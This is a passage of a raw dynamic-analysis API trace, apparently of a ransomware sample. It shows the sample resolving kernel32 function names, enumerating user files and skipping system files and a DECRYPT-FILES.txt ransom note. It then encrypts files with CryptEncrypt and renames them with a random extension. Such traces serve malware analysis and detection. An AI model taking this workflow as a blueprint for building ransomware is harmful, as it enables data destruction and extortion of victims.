returned="DecodeSystemPointer" [0085.467] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.467] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.467] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.467] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.467] lstrlenA (lpString="DELETEATOM") returned 10 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.467] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.467] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.467] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.467] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.467] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.467] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.467] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.467] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.467] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.467] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.468] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.468] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.468] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.468] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.468] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.468] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.468] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.468] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.468] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.468] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.468] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.468] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.468] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.468] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.468] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.468] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.468] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.468] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.468] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.469] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.469] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.469] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.469] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.469] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.469] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.469] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.469] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.469] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.469] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.469] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.469] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.469] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.469] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.470] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.470] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\ZKZJVYYHO0E7C 9.m4a") returned 77 [0085.470] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\ZKZJVYYHO0E7C 9.m4a.5DhvAsp") returned 85 [0085.470] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\ZKZJVYYHO0E7C 9.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\zkzjvyyho0e7c 9.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\ZKZJVYYHO0E7C 9.m4a.5DhvAsp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\zkzjvyyho0e7c 9.m4a.5dhvasp"), dwFlags=0x0) returned 1 [0085.470] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.471] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.471] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.471] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52ca7f20, ftCreationTime.dwHighDateTime=0x1d4c86d, ftLastAccessTime.dwLowDateTime=0xde60f3e0, ftLastAccessTime.dwHighDateTime=0x1d4c631, ftLastWriteTime.dwLowDateTime=0xde60f3e0, ftLastWriteTime.dwHighDateTime=0x1d4c631, nFileSizeHigh=0x0, nFileSizeLow=0xb56b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZKZJVYYHO0E7C 9.m4a", cAlternateFileName="ZKZJVY~1.M4A")) returned 0 [0085.471] FindClose (in: hFindFile=0x5f8b18 | out: hFindFile=0x5f8b18) returned 1 [0085.471] CloseHandle (hObject=0x428) returned 1 [0085.471] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10cb6530, ftCreationTime.dwHighDateTime=0x1d4c69c, ftLastAccessTime.dwLowDateTime=0xf5bb65a0, ftLastAccessTime.dwHighDateTime=0x1d4c813, ftLastWriteTime.dwLowDateTime=0xf5bb65a0, ftLastWriteTime.dwHighDateTime=0x1d4c813, nFileSizeHigh=0x0, nFileSizeLow=0x6e59, dwReserved0=0x0, dwReserved1=0x0, cFileName="a940hnh.wav", cAlternateFileName="")) returned 1 [0085.472] lstrcmpiW (lpString1="a940hnh.wav", lpString2="DECRYPT-FILES.txt") returned -1 [0085.472] lstrcmpiW (lpString1="a940hnh.wav", lpString2="autorun.inf") returned -1 [0085.472] lstrcmpiW (lpString1="a940hnh.wav", lpString2="boot.ini") returned -1 [0085.472] lstrcmpiW (lpString1="a940hnh.wav", lpString2="desktop.ini") returned -1 [0085.472] lstrcmpiW (lpString1="a940hnh.wav", lpString2="ntuser.dat") returned -1 [0085.472] lstrcmpiW (lpString1="a940hnh.wav", lpString2="iconcache.db") returned -1 [0085.472] lstrcmpiW (lpString1="a940hnh.wav", lpString2="bootsect.bak") returned -1 [0085.472] lstrcmpiW (lpString1="a940hnh.wav", lpString2="ntuser.dat.log") returned -1 [0085.472] lstrcmpiW (lpString1="a940hnh.wav", lpString2="thumbs.db") returned -1 [0085.472] lstrcmpiW (lpString1="a940hnh.wav", lpString2="Bootfont.bin") returned -1 [0085.472] lstrlenW (lpString="a940hnh.wav") returned 11 [0085.472] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0085.472] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0085.472] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0085.472] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0085.472] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned 53 [0085.472] lstrlenW (lpString="a940hnh.wav") returned 11 [0085.472] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\" [0085.472] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\", lpString2="a940hnh.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\a940hnh.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\a940hnh.wav" [0085.472] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\a940hnh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\a940hnh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.473] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=28249) returned 1 [0085.473] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.473] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.473] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.473] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.473] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.473] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.474] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.474] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.475] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.475] CloseHandle (hObject=0x42c) returned 1 [0085.475] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.475] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.476] CloseHandle (hObject=0x0) returned 0 [0085.476] CloseHandle (hObject=0x428) returned 1 [0085.476] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.477] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.477] GetTickCount () returned 0x114dd36 [0085.477] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.477] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.477] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.478] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.478] lstrlenA (lpString="kernel32.dll") returned 12 [0085.478] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.478] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.478] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.478] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.478] lstrlenA (lpString="ADDATOMA") returned 8 [0085.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.478] lstrlenA (lpString="ADDATOMW") returned 8 [0085.478] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.479] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.479] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.479] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.479] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.479] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.479] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.479] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.479] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.479] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.479] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.479] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.479] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.479] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.479] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.479] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.479] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.479] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.479] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.479] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.480] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.480] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.480] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.480] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.480] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.480] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.480] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.480] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.480] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.480] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.480] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.480] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.480] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.480] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.480] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.480] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.480] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.480] lstrcpyA (in: 